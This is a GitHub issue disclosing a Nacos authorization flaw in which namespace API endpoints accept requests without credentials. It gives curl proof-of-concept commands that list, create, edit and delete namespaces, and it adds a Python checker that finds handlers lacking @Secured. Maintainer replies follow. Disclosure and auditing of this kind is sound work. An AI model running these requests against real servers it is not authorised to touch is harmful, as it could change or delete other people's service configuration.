
Nacos Unauthorized Vulnerability About NamespaceController #9732

Closed
waterrr opened this issue Dec 20, 2022 · 3 comments
Labels: kind/bug (Category issues or prs related to bug.)
Milestone: 2.2.1
Comments

waterrr commented Dec 20, 2022

Nacos Unauthorized Vulnerability About NamespaceController

Hi, I am a security researcher focusing on cloud-native related risks.
When operating on the Namespace in question through the API, even if auth is turned on, it is still possible to operate without authorization.

I've turned on auth:
nacos.core.auth.enabled=true

POC:

V1:
curl -X GET 'http://localhost:8848/nacos/v1/console/namespaces'
curl -X POST 'http://localhost:8848/nacos/v1/console/namespaces' -d 'customNamespaceId=&namespaceName=dev&namespaceDesc='
curl -X PUT 'http://localhost:8848/nacos/v1/console/namespaces' -d 'namespace=dev&namespaceShowName=test&namespaceDesc=test'
curl -X DELETE 'http://localhost:8848/nacos/v1/console/namespaces' -d 'namespaceId=dev'

V2:
curl -X GET 'http://127.0.0.1:8848/nacos/v2/console/namespace/list'
curl -d 'namespaceId=test_namespace' -d 'namespaceName=test' -X POST 'http://127.0.0.1:8848/nacos/v2/console/namespace'
curl -d 'namespaceId=test_namespace' -d 'namespaceName=test.nacos' -X PUT 'http://127.0.0.1:8848/nacos/v2/console/namespace'
curl -d 'namespaceId=test_namespace' -X DELETE 'http://127.0.0.1:8848/nacos/v2/console/namespace'

As you can see both V1 and V2 are affected.
I conducted a code audit for this purpose and found some problems in this file.

console/src/main/java/com/alibaba/nacos/console/controller/NamespaceController.java

The code in question is in the above file, and all operations regarding Namespace are not authenticated, which I think is unreasonable.

The section on Namespace operations should include authenticated code, similar to the other interfaces:
@Secured(action = ActionTypes.READ, signType = SignType.CONFIG)

This part of the interface can leak sensitive information (namespace, namespaceShowName, namespaceDesc, configCount), and attackers can even create, modify, and delete it.

Other interfaces (ServerStateController, HealthController) have similar issues, but I don't think they pose a vulnerability exploitation risk for now, and I will continue to support and follow the Nacos project in the hope that the cloud-native environment gets better and better.
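The report above boils down to a single pattern: request-handler methods that carry a Spring mapping annotation but no @Secured annotation. The following is an added example, not code from this issue or from the Nacos project: a small static check that walks Java controller source and lists every mapped handler whose annotation group lacks @Secured, which is the kind of audit a maintainer can run over the console module before a release. The sample source embedded in it is constructed to mirror the shape of the v1 namespace endpoints and is not the real NamespaceController.java; the field name, method bodies and ActionTypes.WRITE usage are assumptions.

```python
"""Static audit of Spring-style controller source for handler methods that
have a mapping annotation (@GetMapping, @PostMapping, ...) but no @Secured.

Added example for this issue; not Nacos project code. Assumptions: annotations
are written one per line directly above the method, and @Secured is only
honoured at method level (class-level annotations are not treated as guards).
"""
import re
from typing import Dict, List

# Constructed sample modelled on the v1 namespace endpoints. Only
# createNamespace and deleteNamespace carry @Secured; the other two do not.
SAMPLE_CONTROLLER = """\
@RestController
@RequestMapping("/v1/console/namespaces")
public class NamespaceController {

    @Autowired
    private Object store; // assumed field, not a handler

    @GetMapping
    public RestResult<List<Namespace>> getNamespaces() {
        return null; // body omitted
    }

    @Secured(action = ActionTypes.WRITE, signType = SignType.CONFIG)
    @PostMapping
    public Boolean createNamespace(@RequestParam String namespaceName) {
        return null; // body omitted
    }

    @PutMapping
    public Boolean editNamespace(@RequestParam String namespace, @RequestParam String namespaceShowName) {
        return null; // body omitted
    }

    @Secured(action = ActionTypes.WRITE, signType = SignType.CONFIG)
    @DeleteMapping
    public Boolean deleteNamespace(@RequestParam String namespaceId) {
        return null; // body omitted
    }
}
"""

MAPPING_RE = re.compile(r"@(?:Get|Post|Put|Delete|Patch|Request)Mapping\b")
SECURED_RE = re.compile(r"@Secured\b")
CLASS_RE = re.compile(r"^\s*(?:public\s+|final\s+|abstract\s+)*class\s+\w+")
# visibility, return type (generics allowed), method name, opening parenthesis
METHOD_RE = re.compile(r"^\s*(?:public|protected|private)\s+[\w<>\[\],\s?]+?\s+(\w+)\s*\(")


def find_unsecured_handlers(source: str) -> List[Dict[str, object]]:
    """Return one finding per method whose annotation group contains a mapping
    annotation but no @Secured annotation."""
    findings: List[Dict[str, object]] = []
    pending: List[str] = []  # annotation lines seen since the last declaration
    for lineno, line in enumerate(source.splitlines(), start=1):
        stripped = line.strip()
        if not stripped:
            continue  # blank lines do not break an annotation group
        if stripped.startswith("@"):
            pending.append(stripped)
            continue
        if CLASS_RE.match(line):
            # Class-level annotations such as @RequestMapping guard nothing here.
            pending = []
            continue
        method = METHOD_RE.match(line)
        if method:
            mappings = [a for a in pending if MAPPING_RE.search(a)]
            if mappings and not any(SECURED_RE.search(a) for a in pending):
                findings.append(
                    {"method": method.group(1), "line": lineno, "mapping": mappings[0]}
                )
        # Any other statement (field, body line) ends the current annotation group.
        pending = []
    return findings


def format_report(findings: List[Dict[str, object]]) -> str:
    """Human-readable summary of the findings."""
    if not findings:
        return "OK: every mapped handler carries @Secured"
    return "\n".join(
        f"line {f['line']}: {f['method']} ({f['mapping']}) has no @Secured"
        for f in findings
    )


if __name__ == "__main__":
    print(format_report(find_unsecured_handlers(SAMPLE_CONTROLLER)))
```

Run against a real controller file (`find_unsecured_handlers(open(path).read())`), the check flags exactly the read (`@GetMapping`) and edit (`@PutMapping`) handlers in the sample, which matches the shape of the gap described in this issue; whether a flagged list endpoint is acceptable as public data is then a deliberate decision rather than an omission.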

@a25017012
follow

KomachiSion (Collaborator) commented Dec 21, 2022

The v1 create/delete/update namespace APIs contain an auth check.

The list and get have no auth check because it's public data.

The v2 API has added an auth check in 2.2.0 by #9671.

KomachiSion added the labels status/invalid (This doesn't seem right) and kind/bug (Category issues or prs related to bug.), then removed status/invalid, Dec 21, 2022
KomachiSion added this to the 2.2.1 milestone Dec 27, 2022

KomachiSion (Collaborator) commented:

#9754
